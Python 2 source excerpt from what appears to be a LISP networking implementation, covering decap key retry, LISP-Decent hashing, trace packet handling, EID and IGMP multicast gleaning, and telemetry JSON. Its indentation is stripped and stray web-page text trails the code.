def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return dictionary arraay if json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#------------------------------------------------------------------------------
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.